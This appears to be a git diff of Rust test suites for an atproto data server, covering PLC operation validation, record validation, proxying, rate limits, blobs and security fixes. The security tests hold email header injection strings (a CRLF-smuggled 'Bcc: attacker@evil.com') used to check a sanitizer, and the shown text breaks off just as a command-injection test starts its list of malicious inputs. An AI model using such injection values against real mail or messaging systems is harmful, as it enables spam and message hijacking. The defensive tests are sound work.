let op = json!({
···
114
123
let result = validate_plc_operation(&op);
115
124
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
116
125
}
126
+
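Taken together, the cases above pin down the shape `validate_plc_operation` expects without showing its body. A minimal sketch of that contract (hypothetical helper name; `serde_json` only): a JSON object whose `type` is `plc_operation` or `plc_tombstone`, a `sig`, and, for full operations, `rotationKeys`, `verificationMethods`, `alsoKnownAs`, and `services`.

```rust
use serde_json::Value;

// Sketch of the structural checks these tests describe.
fn validate_plc_operation_sketch(op: &Value) -> Result<(), String> {
    let obj = op.as_object().ok_or("operation must be a JSON object")?;
    let typ = obj
        .get("type")
        .and_then(Value::as_str)
        .ok_or("Missing type")?;
    if typ != "plc_operation" && typ != "plc_tombstone" {
        return Err(format!("Invalid type: {}", typ));
    }
    if obj.get("sig").and_then(Value::as_str).is_none() {
        return Err("Missing sig".to_string());
    }
    // Tombstones carry only prev + sig; full operations need the remaining fields.
    if typ == "plc_operation" {
        for field in ["rotationKeys", "verificationMethods", "alsoKnownAs", "services"] {
            if !obj.contains_key(field) {
                return Err(format!("Missing {}", field));
            }
        }
    }
    Ok(())
}
```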
117
127
#[test]
118
128
fn test_validate_rotation_key_required() {
119
129
let key = SigningKey::random(&mut rand::thread_rng());
···
141
151
let result = validate_plc_operation_for_submission(&op, &ctx);
142
152
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
143
153
}
154
+
144
155
#[test]
145
156
fn test_validate_signing_key_match() {
146
157
let key = SigningKey::random(&mut rand::thread_rng());
···
168
179
let result = validate_plc_operation_for_submission(&op, &ctx);
169
180
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
170
181
}
182
+
171
183
#[test]
172
184
fn test_validate_handle_match() {
173
185
let key = SigningKey::random(&mut rand::thread_rng());
···
194
206
let result = validate_plc_operation_for_submission(&op, &ctx);
195
207
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
196
208
}
209
+
197
210
#[test]
198
211
fn test_validate_pds_service_type() {
199
212
let key = SigningKey::random(&mut rand::thread_rng());
···
220
233
let result = validate_plc_operation_for_submission(&op, &ctx);
221
234
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
222
235
}
236
+
223
237
#[test]
224
238
fn test_validate_pds_endpoint_match() {
225
239
let key = SigningKey::random(&mut rand::thread_rng());
···
246
260
let result = validate_plc_operation_for_submission(&op, &ctx);
247
261
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
248
262
}
263
+
249
264
#[test]
250
265
fn test_verify_signature_secp256k1() {
251
266
let key = SigningKey::random(&mut rand::thread_rng());
···
264
279
assert!(result.is_ok());
265
280
assert!(result.unwrap());
266
281
}
282
+
267
283
#[test]
268
284
fn test_verify_signature_wrong_key() {
269
285
let key = SigningKey::random(&mut rand::thread_rng());
···
283
299
assert!(result.is_ok());
284
300
assert!(!result.unwrap());
285
301
}
302
+
286
303
#[test]
287
304
fn test_verify_signature_invalid_did_key_format() {
288
305
let key = SigningKey::random(&mut rand::thread_rng());
···
300
317
assert!(result.is_ok());
301
318
assert!(!result.unwrap());
302
319
}
320
+
303
321
#[test]
304
322
fn test_tombstone_validation() {
305
323
let op = json!({
···
310
328
let result = validate_plc_operation(&op);
311
329
assert!(result.is_ok());
312
330
}
331
+
313
332
#[test]
314
333
fn test_cid_for_cbor_deterministic() {
315
334
let value = json!({
···
321
340
assert_eq!(cid1, cid2, "CID generation should be deterministic");
322
341
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
323
342
}
343
+
324
344
#[test]
325
345
fn test_cid_different_for_different_data() {
326
346
let value1 = json!({"data": 1});
···
329
349
let cid2 = cid_for_cbor(&value2).unwrap();
330
350
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
331
351
}
352
+
332
353
#[test]
333
354
fn test_signing_key_to_did_key_format() {
334
355
let key = SigningKey::random(&mut rand::thread_rng());
···
336
357
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
337
358
assert!(did_key.len() > 50, "Did key should be reasonably long");
338
359
}
360
+
339
361
#[test]
340
362
fn test_signing_key_to_did_key_unique() {
341
363
let key1 = SigningKey::random(&mut rand::thread_rng());
···
344
366
let did2 = signing_key_to_did_key(&key2);
345
367
assert_ne!(did1, did2, "Different keys should produce different did:keys");
346
368
}
369
+
347
370
#[test]
348
371
fn test_signing_key_to_did_key_consistent() {
349
372
let key = SigningKey::random(&mut rand::thread_rng());
···
351
374
let did2 = signing_key_to_did_key(&key);
352
375
assert_eq!(did1, did2, "Same key should produce same did:key");
353
376
}
377
+
354
378
#[test]
355
379
fn test_sign_operation_removes_existing_sig() {
356
380
let key = SigningKey::random(&mut rand::thread_rng());
···
367
391
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
368
392
assert_ne!(new_sig, "old_signature", "Should replace old signature");
369
393
}
394
+
370
395
#[test]
371
396
fn test_validate_plc_operation_not_object() {
372
397
let result = validate_plc_operation(&json!("not an object"));
373
398
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
374
399
}
400
+
375
401
#[test]
376
402
fn test_validate_for_submission_tombstone_passes() {
377
403
let key = SigningKey::random(&mut rand::thread_rng());
···
390
416
let result = validate_plc_operation_for_submission(&op, &ctx);
391
417
assert!(result.is_ok(), "Tombstone should pass submission validation");
392
418
}
419
+
393
420
#[test]
394
421
fn test_verify_signature_missing_sig() {
395
422
let op = json!({
···
402
429
let result = verify_operation_signature(&op, &[]);
403
430
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
404
431
}
432
+
405
433
#[test]
406
434
fn test_verify_signature_invalid_base64() {
407
435
let op = json!({
···
415
443
let result = verify_operation_signature(&op, &[]);
416
444
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
417
445
}
446
+
418
447
#[test]
419
448
fn test_plc_operation_struct() {
420
449
let mut services = HashMap::new();
+5 tests/proxy.rs
···
4
4
use reqwest::Client;
5
5
use std::sync::Arc;
6
6
use tokio::net::TcpListener;
7
+
7
8
async fn spawn_mock_upstream() -> (
8
9
String,
9
10
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
···
31
32
});
32
33
(format!("http://{}", addr), rx)
33
34
}
35
+
34
36
#[tokio::test]
35
37
async fn test_proxy_via_header() {
36
38
let app_url = common::base_url().await;
···
49
51
assert_eq!(uri, "/xrpc/com.example.test");
50
52
assert_eq!(auth, Some("Bearer test-token".to_string()));
51
53
}
54
+
52
55
#[tokio::test]
53
56
async fn test_proxy_auth_signing() {
54
57
let app_url = common::base_url().await;
···
77
80
assert_eq!(claims["aud"], upstream_url);
78
81
assert_eq!(claims["lxm"], "com.example.signed");
79
82
}
83
+
80
84
#[tokio::test]
81
85
async fn test_proxy_post_with_body() {
82
86
let app_url = common::base_url().await;
···
100
104
assert_eq!(uri, "/xrpc/com.example.postMethod");
101
105
assert_eq!(auth, Some("Bearer test-token".to_string()));
102
106
}
107
+
103
108
#[tokio::test]
104
109
async fn test_proxy_with_query_params() {
105
110
let app_url = common::base_url().await;
+5 tests/rate_limit.rs
···
2
2
use common::{base_url, client};
3
3
use reqwest::StatusCode;
4
4
use serde_json::json;
5
+
5
6
#[tokio::test]
6
7
#[ignore = "rate limiting is disabled in test environment"]
7
8
async fn test_login_rate_limiting() {
···
39
40
rate_limited_count
40
41
);
41
42
}
43
+
42
44
#[tokio::test]
43
45
#[ignore = "rate limiting is disabled in test environment"]
44
46
async fn test_password_reset_rate_limiting() {
···
78
80
success_count
79
81
);
80
82
}
83
+
81
84
#[tokio::test]
82
85
#[ignore = "rate limiting is disabled in test environment"]
83
86
async fn test_account_creation_rate_limiting() {
···
117
120
rate_limited_count
118
121
);
119
122
}
123
+
120
124
#[tokio::test]
121
125
async fn test_valkey_connection() {
122
126
if std::env::var("VALKEY_URL").is_err() {
···
154
158
.await
155
159
.expect("DEL failed");
156
160
}
161
+
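The distributed limiter itself lives behind `VALKEY_URL` and is not shown in this diff. As an illustration only (not the crate's implementation), a fixed-window counter keyed by caller captures the behaviour these tests probe: the first N requests in a window succeed and the rest are rejected until the window rolls over.

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

// In-memory fixed-window limiter; a Valkey-backed variant would swap the map
// for INCR/EXPIRE on a shared key so multiple instances see the same counters.
struct FixedWindowLimiter {
    limit: u32,
    window: Duration,
    counters: HashMap<String, (Instant, u32)>,
}

impl FixedWindowLimiter {
    fn new(limit: u32, window: Duration) -> Self {
        Self { limit, window, counters: HashMap::new() }
    }

    fn check(&mut self, key: &str) -> bool {
        let now = Instant::now();
        let entry = self.counters.entry(key.to_string()).or_insert((now, 0));
        if now.duration_since(entry.0) >= self.window {
            *entry = (now, 0); // window expired: start a new one
        }
        entry.1 += 1;
        entry.1 <= self.limit
    }
}
```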
157
162
#[tokio::test]
158
163
async fn test_distributed_rate_limiter_directly() {
159
164
if std::env::var("VALKEY_URL").is_err() {
+53 tests/record_validation.rs
···
1
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
2
use serde_json::json;
3
+
3
4
fn now() -> String {
4
5
chrono::Utc::now().to_rfc3339()
5
6
}
7
+
6
8
#[test]
7
9
fn test_validate_post_valid() {
8
10
let validator = RecordValidator::new();
···
14
16
let result = validator.validate(&post, "app.bsky.feed.post");
15
17
assert_eq!(result.unwrap(), ValidationStatus::Valid);
16
18
}
19
+
17
20
#[test]
18
21
fn test_validate_post_missing_text() {
19
22
let validator = RecordValidator::new();
···
24
27
let result = validator.validate(&post, "app.bsky.feed.post");
25
28
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
26
29
}
30
+
27
31
#[test]
28
32
fn test_validate_post_missing_created_at() {
29
33
let validator = RecordValidator::new();
···
34
38
let result = validator.validate(&post, "app.bsky.feed.post");
35
39
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
36
40
}
41
+
37
42
#[test]
38
43
fn test_validate_post_text_too_long() {
39
44
let validator = RecordValidator::new();
···
46
51
let result = validator.validate(&post, "app.bsky.feed.post");
47
52
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
48
53
}
54
+
49
55
#[test]
50
56
fn test_validate_post_text_at_limit() {
51
57
let validator = RecordValidator::new();
···
58
64
let result = validator.validate(&post, "app.bsky.feed.post");
59
65
assert_eq!(result.unwrap(), ValidationStatus::Valid);
60
66
}
67
+
61
68
#[test]
62
69
fn test_validate_post_too_many_langs() {
63
70
let validator = RecordValidator::new();
···
70
77
let result = validator.validate(&post, "app.bsky.feed.post");
71
78
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
72
79
}
80
+
73
81
#[test]
74
82
fn test_validate_post_three_langs_ok() {
75
83
let validator = RecordValidator::new();
···
82
90
let result = validator.validate(&post, "app.bsky.feed.post");
83
91
assert_eq!(result.unwrap(), ValidationStatus::Valid);
84
92
}
93
+
85
94
#[test]
86
95
fn test_validate_post_too_many_tags() {
87
96
let validator = RecordValidator::new();
···
94
103
let result = validator.validate(&post, "app.bsky.feed.post");
95
104
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
96
105
}
106
+
97
107
#[test]
98
108
fn test_validate_post_eight_tags_ok() {
99
109
let validator = RecordValidator::new();
···
106
116
let result = validator.validate(&post, "app.bsky.feed.post");
107
117
assert_eq!(result.unwrap(), ValidationStatus::Valid);
108
118
}
119
+
109
120
#[test]
110
121
fn test_validate_post_tag_too_long() {
111
122
let validator = RecordValidator::new();
···
119
130
let result = validator.validate(&post, "app.bsky.feed.post");
120
131
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
121
132
}
133
+
122
134
#[test]
123
135
fn test_validate_profile_valid() {
124
136
let validator = RecordValidator::new();
···
130
142
let result = validator.validate(&profile, "app.bsky.actor.profile");
131
143
assert_eq!(result.unwrap(), ValidationStatus::Valid);
132
144
}
145
+
133
146
#[test]
134
147
fn test_validate_profile_empty_ok() {
135
148
let validator = RecordValidator::new();
···
139
152
let result = validator.validate(&profile, "app.bsky.actor.profile");
140
153
assert_eq!(result.unwrap(), ValidationStatus::Valid);
141
154
}
155
+
142
156
#[test]
143
157
fn test_validate_profile_displayname_too_long() {
144
158
let validator = RecordValidator::new();
···
150
164
let result = validator.validate(&profile, "app.bsky.actor.profile");
151
165
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
152
166
}
167
+
153
168
#[test]
154
169
fn test_validate_profile_description_too_long() {
155
170
let validator = RecordValidator::new();
···
161
176
let result = validator.validate(&profile, "app.bsky.actor.profile");
162
177
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
163
178
}
179
+
164
180
#[test]
165
181
fn test_validate_like_valid() {
166
182
let validator = RecordValidator::new();
···
175
191
let result = validator.validate(&like, "app.bsky.feed.like");
176
192
assert_eq!(result.unwrap(), ValidationStatus::Valid);
177
193
}
194
+
178
195
#[test]
179
196
fn test_validate_like_missing_subject() {
180
197
let validator = RecordValidator::new();
···
185
202
let result = validator.validate(&like, "app.bsky.feed.like");
186
203
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
187
204
}
205
+
188
206
#[test]
189
207
fn test_validate_like_missing_subject_uri() {
190
208
let validator = RecordValidator::new();
···
198
216
let result = validator.validate(&like, "app.bsky.feed.like");
199
217
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
200
218
}
219
+
201
220
#[test]
202
221
fn test_validate_like_invalid_subject_uri() {
203
222
let validator = RecordValidator::new();
···
212
231
let result = validator.validate(&like, "app.bsky.feed.like");
213
232
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
214
233
}
234
+
215
235
#[test]
216
236
fn test_validate_repost_valid() {
217
237
let validator = RecordValidator::new();
···
226
246
let result = validator.validate(&repost, "app.bsky.feed.repost");
227
247
assert_eq!(result.unwrap(), ValidationStatus::Valid);
228
248
}
249
+
229
250
#[test]
230
251
fn test_validate_repost_missing_subject() {
231
252
let validator = RecordValidator::new();
···
236
257
let result = validator.validate(&repost, "app.bsky.feed.repost");
237
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
238
259
}
260
+
239
261
#[test]
240
262
fn test_validate_follow_valid() {
241
263
let validator = RecordValidator::new();
···
247
269
let result = validator.validate(&follow, "app.bsky.graph.follow");
248
270
assert_eq!(result.unwrap(), ValidationStatus::Valid);
249
271
}
272
+
250
273
#[test]
251
274
fn test_validate_follow_missing_subject() {
252
275
let validator = RecordValidator::new();
···
257
280
let result = validator.validate(&follow, "app.bsky.graph.follow");
258
281
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
282
}
283
+
260
284
#[test]
261
285
fn test_validate_follow_invalid_subject() {
262
286
let validator = RecordValidator::new();
···
268
292
let result = validator.validate(&follow, "app.bsky.graph.follow");
269
293
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
270
294
}
295
+
271
296
#[test]
272
297
fn test_validate_block_valid() {
273
298
let validator = RecordValidator::new();
···
279
304
let result = validator.validate(&block, "app.bsky.graph.block");
280
305
assert_eq!(result.unwrap(), ValidationStatus::Valid);
281
306
}
307
+
282
308
#[test]
283
309
fn test_validate_block_invalid_subject() {
284
310
let validator = RecordValidator::new();
···
290
316
let result = validator.validate(&block, "app.bsky.graph.block");
291
317
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
292
318
}
319
+
293
320
#[test]
294
321
fn test_validate_list_valid() {
295
322
let validator = RecordValidator::new();
···
302
329
let result = validator.validate(&list, "app.bsky.graph.list");
303
330
assert_eq!(result.unwrap(), ValidationStatus::Valid);
304
331
}
332
+
305
333
#[test]
306
334
fn test_validate_list_name_too_long() {
307
335
let validator = RecordValidator::new();
···
315
343
let result = validator.validate(&list, "app.bsky.graph.list");
316
344
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
317
345
}
346
+
318
347
#[test]
319
348
fn test_validate_list_empty_name() {
320
349
let validator = RecordValidator::new();
···
327
356
let result = validator.validate(&list, "app.bsky.graph.list");
328
357
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
329
358
}
359
+
330
360
#[test]
331
361
fn test_validate_feed_generator_valid() {
332
362
let validator = RecordValidator::new();
···
339
369
let result = validator.validate(&generator, "app.bsky.feed.generator");
340
370
assert_eq!(result.unwrap(), ValidationStatus::Valid);
341
371
}
372
+
342
373
#[test]
343
374
fn test_validate_feed_generator_displayname_too_long() {
344
375
let validator = RecordValidator::new();
···
352
383
let result = validator.validate(&generator, "app.bsky.feed.generator");
353
384
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
354
385
}
386
+
355
387
#[test]
356
388
fn test_validate_unknown_type_returns_unknown() {
357
389
let validator = RecordValidator::new();
···
362
394
let result = validator.validate(&custom, "com.custom.record");
363
395
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
364
396
}
397
+
365
398
#[test]
366
399
fn test_validate_unknown_type_strict_rejects() {
367
400
let validator = RecordValidator::new().require_lexicon(true);
···
372
405
let result = validator.validate(&custom, "com.custom.record");
373
406
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
374
407
}
408
+
375
409
#[test]
376
410
fn test_validate_type_mismatch() {
377
411
let validator = RecordValidator::new();
···
384
418
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
385
419
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
386
420
}
421
+
387
422
#[test]
388
423
fn test_validate_missing_type() {
389
424
let validator = RecordValidator::new();
···
393
428
let result = validator.validate(&record, "app.bsky.feed.post");
394
429
assert!(matches!(result, Err(ValidationError::MissingType)));
395
430
}
431
+
396
432
#[test]
397
433
fn test_validate_not_object() {
398
434
let validator = RecordValidator::new();
···
400
436
let result = validator.validate(&record, "app.bsky.feed.post");
401
437
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
402
438
}
439
+
403
440
#[test]
404
441
fn test_validate_datetime_format_valid() {
405
442
let validator = RecordValidator::new();
···
411
448
let result = validator.validate(&post, "app.bsky.feed.post");
412
449
assert_eq!(result.unwrap(), ValidationStatus::Valid);
413
450
}
451
+
414
452
#[test]
415
453
fn test_validate_datetime_with_offset() {
416
454
let validator = RecordValidator::new();
···
422
460
let result = validator.validate(&post, "app.bsky.feed.post");
423
461
assert_eq!(result.unwrap(), ValidationStatus::Valid);
424
462
}
463
+
425
464
#[test]
426
465
fn test_validate_datetime_invalid_format() {
427
466
let validator = RecordValidator::new();
···
433
472
let result = validator.validate(&post, "app.bsky.feed.post");
434
473
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
435
474
}
475
+
436
476
#[test]
437
477
fn test_validate_record_key_valid() {
438
478
assert!(validate_record_key("3k2n5j2").is_ok());
···
442
482
assert!(validate_record_key("valid~key").is_ok());
443
483
assert!(validate_record_key("self").is_ok());
444
484
}
485
+
445
486
#[test]
446
487
fn test_validate_record_key_empty() {
447
488
let result = validate_record_key("");
448
489
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
449
490
}
491
+
450
492
#[test]
451
493
fn test_validate_record_key_dot() {
452
494
assert!(validate_record_key(".").is_err());
453
495
assert!(validate_record_key("..").is_err());
454
496
}
497
+
455
498
#[test]
456
499
fn test_validate_record_key_invalid_chars() {
457
500
assert!(validate_record_key("invalid/key").is_err());
···
459
502
assert!(validate_record_key("invalid@key").is_err());
460
503
assert!(validate_record_key("invalid#key").is_err());
461
504
}
505
+
462
506
#[test]
463
507
fn test_validate_record_key_too_long() {
464
508
let long_key = "k".repeat(513);
465
509
let result = validate_record_key(&long_key);
466
510
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
467
511
}
512
+
468
513
#[test]
469
514
fn test_validate_record_key_at_max_length() {
470
515
let max_key = "k".repeat(512);
471
516
assert!(validate_record_key(&max_key).is_ok());
472
517
}
518
+
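The record-key tests above imply the rule set without showing `validate_record_key` itself. A sketch consistent with them (hypothetical name; the exact character set is an assumption based on the accepted and rejected keys): 1 to 512 characters from a URL-safe alphabet, with the literal keys `.` and `..` rejected.

```rust
// Sketch of an atproto record-key check matching the cases exercised above.
fn validate_record_key_sketch(rkey: &str) -> Result<(), String> {
    if rkey.is_empty() || rkey.len() > 512 {
        return Err("record key must be 1-512 characters".to_string());
    }
    if rkey == "." || rkey == ".." {
        return Err("record key cannot be '.' or '..'".to_string());
    }
    let ok = rkey
        .chars()
        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '-' | '_' | ':' | '~'));
    if !ok {
        return Err("record key contains invalid characters".to_string());
    }
    Ok(())
}
```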
473
519
#[test]
474
520
fn test_validate_collection_nsid_valid() {
475
521
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
477
523
assert!(validate_collection_nsid("a.b.c").is_ok());
478
524
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
479
525
}
526
+
480
527
#[test]
481
528
fn test_validate_collection_nsid_empty() {
482
529
let result = validate_collection_nsid("");
483
530
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
484
531
}
532
+
485
533
#[test]
486
534
fn test_validate_collection_nsid_too_few_segments() {
487
535
assert!(validate_collection_nsid("a").is_err());
488
536
assert!(validate_collection_nsid("a.b").is_err());
489
537
}
538
+
490
539
#[test]
491
540
fn test_validate_collection_nsid_empty_segment() {
492
541
assert!(validate_collection_nsid("a..b.c").is_err());
493
542
assert!(validate_collection_nsid(".a.b.c").is_err());
494
543
assert!(validate_collection_nsid("a.b.c.").is_err());
495
544
}
545
+
496
546
#[test]
497
547
fn test_validate_collection_nsid_invalid_chars() {
498
548
assert!(validate_collection_nsid("a.b.c/d").is_err());
499
549
assert!(validate_collection_nsid("a.b.c_d").is_err());
500
550
assert!(validate_collection_nsid("a.b.c@d").is_err());
501
551
}
552
+
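Similarly, the NSID tests sketch the collection-name rule: at least three dot-separated, non-empty segments of alphanumerics and hyphens. A minimal version consistent with those cases (hypothetical name):

```rust
// Sketch of an NSID (collection name) check matching the cases above.
fn validate_collection_nsid_sketch(nsid: &str) -> Result<(), String> {
    let segments: Vec<&str> = nsid.split('.').collect();
    if segments.len() < 3 {
        return Err("NSID needs at least three segments".to_string());
    }
    for seg in &segments {
        if seg.is_empty() {
            return Err("NSID segments cannot be empty".to_string());
        }
        if !seg.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
            return Err("NSID segments may only contain alphanumerics and hyphens".to_string());
        }
    }
    Ok(())
}
```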
502
553
#[test]
503
554
fn test_validate_threadgate() {
504
555
let validator = RecordValidator::new();
···
510
561
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
511
562
assert_eq!(result.unwrap(), ValidationStatus::Valid);
512
563
}
564
+
513
565
#[test]
514
566
fn test_validate_labeler_service() {
515
567
let validator = RecordValidator::new();
···
523
575
let result = validator.validate(&labeler, "app.bsky.labeler.service");
524
576
assert_eq!(result.unwrap(), ValidationStatus::Valid);
525
577
}
578
+
526
579
#[test]
527
580
fn test_validate_list_item() {
528
581
let validator = RecordValidator::new();
+6 tests/repo_batch.rs
···
3
3
use chrono::Utc;
4
4
use reqwest::StatusCode;
5
5
use serde_json::{Value, json};
6
+
6
7
#[tokio::test]
7
8
async fn test_apply_writes_create() {
8
9
let client = client();
···
50
51
assert!(results[0]["uri"].is_string());
51
52
assert!(results[0]["cid"].is_string());
52
53
}
54
+
53
55
#[tokio::test]
54
56
async fn test_apply_writes_update() {
55
57
let client = client();
···
108
110
assert_eq!(results.len(), 1);
109
111
assert!(results[0]["uri"].is_string());
110
112
}
113
+
111
114
#[tokio::test]
112
115
async fn test_apply_writes_delete() {
113
116
let client = client();
···
171
174
.expect("Failed to verify");
172
175
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
173
176
}
177
+
174
178
#[tokio::test]
175
179
async fn test_apply_writes_mixed_operations() {
176
180
let client = client();
···
258
262
let results = body["results"].as_array().unwrap();
259
263
assert_eq!(results.len(), 3);
260
264
}
265
+
261
266
#[tokio::test]
262
267
async fn test_apply_writes_no_auth() {
263
268
let client = client();
···
286
291
.expect("Failed to send request");
287
292
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
288
293
}
294
+
289
295
#[tokio::test]
290
296
async fn test_apply_writes_empty_writes() {
291
297
let client = client();
+6 tests/repo_blob.rs
···
2
2
use common::*;
3
3
use reqwest::{StatusCode, header};
4
4
use serde_json::Value;
5
+
5
6
#[tokio::test]
6
7
async fn test_upload_blob_no_auth() {
7
8
let client = client();
···
19
20
let body: Value = res.json().await.expect("Response was not valid JSON");
20
21
assert_eq!(body["error"], "AuthenticationRequired");
21
22
}
23
+
22
24
#[tokio::test]
23
25
async fn test_upload_blob_success() {
24
26
let client = client();
···
38
40
let body: Value = res.json().await.expect("Response was not valid JSON");
39
41
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
40
42
}
43
+
41
44
#[tokio::test]
42
45
async fn test_upload_blob_bad_token() {
43
46
let client = client();
···
56
59
let body: Value = res.json().await.expect("Response was not valid JSON");
57
60
assert_eq!(body["error"], "AuthenticationFailed");
58
61
}
62
+
59
63
#[tokio::test]
60
64
async fn test_upload_blob_unsupported_mime_type() {
61
65
let client = client();
···
73
77
.expect("Failed to send request");
74
78
assert_eq!(res.status(), StatusCode::OK);
75
79
}
80
+
76
81
#[tokio::test]
77
82
async fn test_list_missing_blobs() {
78
83
let client = client();
···
90
95
let body: Value = res.json().await.expect("Response was not valid JSON");
91
96
assert!(body["blobs"].is_array());
92
97
}
98
+
93
99
#[tokio::test]
94
100
async fn test_list_missing_blobs_no_auth() {
95
101
let client = client();
+39 tests/security_fixes.rs
···
4
4
};
5
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
6
use bspds::image::{ImageProcessor, ImageError};
7
+
7
8
#[test]
8
9
fn test_sanitize_header_value_removes_crlf() {
9
10
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
13
14
assert!(sanitized.contains("Injected"), "Original content should be preserved");
14
15
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
15
16
}
17
+
16
18
#[test]
17
19
fn test_sanitize_header_value_preserves_content() {
18
20
let normal = "Normal Subject Line";
19
21
let sanitized = sanitize_header_value(normal);
20
22
assert_eq!(sanitized, "Normal Subject Line");
21
23
}
24
+
22
25
#[test]
23
26
fn test_sanitize_header_value_trims_whitespace() {
24
27
let padded = " Subject ";
25
28
let sanitized = sanitize_header_value(padded);
26
29
assert_eq!(sanitized, "Subject");
27
30
}
31
+
28
32
#[test]
29
33
fn test_sanitize_header_value_handles_multiple_newlines() {
30
34
let input = "Line1\r\nLine2\nLine3\rLine4";
···
34
38
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
35
39
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
36
40
}
41
+
37
42
#[test]
38
43
fn test_email_header_injection_sanitization() {
39
44
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
44
49
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
45
50
assert!(sanitized.contains("X-Injected:"), "All content on same line");
46
51
}
52
+
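These cases pin down the behaviour of `sanitize_header_value` without showing it: CR/LF can never survive into the header, the surrounding text does, and leading and trailing whitespace is trimmed. A sketch that satisfies them (hypothetical name; the real helper may join the pieces differently):

```rust
// Sketch: collapse CR/LF into spaces so injected "headers" stay on one line, then
// normalize whitespace, which also trims the ends.
fn sanitize_header_value_sketch(value: &str) -> String {
    value
        .replace('\r', " ")
        .replace('\n', " ")
        .split_whitespace()
        .collect::<Vec<_>>()
        .join(" ")
}
```

With this, "Injected\r\nBcc: attacker@evil.com" becomes a single line that still contains both "Injected" and "Bcc:", which is exactly what the assertions above check.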
47
53
#[test]
48
54
fn test_valid_phone_number_accepts_correct_format() {
49
55
assert!(is_valid_phone_number("+1234567890"));
···
52
58
assert!(is_valid_phone_number("+4915123456789"));
53
59
assert!(is_valid_phone_number("+1"));
54
60
}
61
+
55
62
#[test]
56
63
fn test_valid_phone_number_rejects_missing_plus() {
57
64
assert!(!is_valid_phone_number("1234567890"));
58
65
assert!(!is_valid_phone_number("12025551234"));
59
66
}
67
+
60
68
#[test]
61
69
fn test_valid_phone_number_rejects_empty() {
62
70
assert!(!is_valid_phone_number(""));
63
71
}
72
+
64
73
#[test]
65
74
fn test_valid_phone_number_rejects_just_plus() {
66
75
assert!(!is_valid_phone_number("+"));
67
76
}
77
+
68
78
#[test]
69
79
fn test_valid_phone_number_rejects_too_long() {
70
80
assert!(!is_valid_phone_number("+12345678901234567890123"));
71
81
}
82
+
72
83
#[test]
73
84
fn test_valid_phone_number_rejects_letters() {
74
85
assert!(!is_valid_phone_number("+abc123"));
75
86
assert!(!is_valid_phone_number("+1234abc"));
76
87
assert!(!is_valid_phone_number("+a"));
77
88
}
89
+
78
90
#[test]
79
91
fn test_valid_phone_number_rejects_spaces() {
80
92
assert!(!is_valid_phone_number("+1234 5678"));
81
93
assert!(!is_valid_phone_number("+ 1234567890"));
82
94
assert!(!is_valid_phone_number("+1 "));
83
95
}
96
+
84
97
#[test]
85
98
fn test_valid_phone_number_rejects_special_chars() {
86
99
assert!(!is_valid_phone_number("+123-456-7890"));
87
100
assert!(!is_valid_phone_number("+1(234)567890"));
88
101
assert!(!is_valid_phone_number("+1.234.567.890"));
89
102
}
103
+
90
104
#[test]
91
105
fn test_signal_recipient_command_injection_blocked() {
92
106
let malicious_inputs = vec![
···
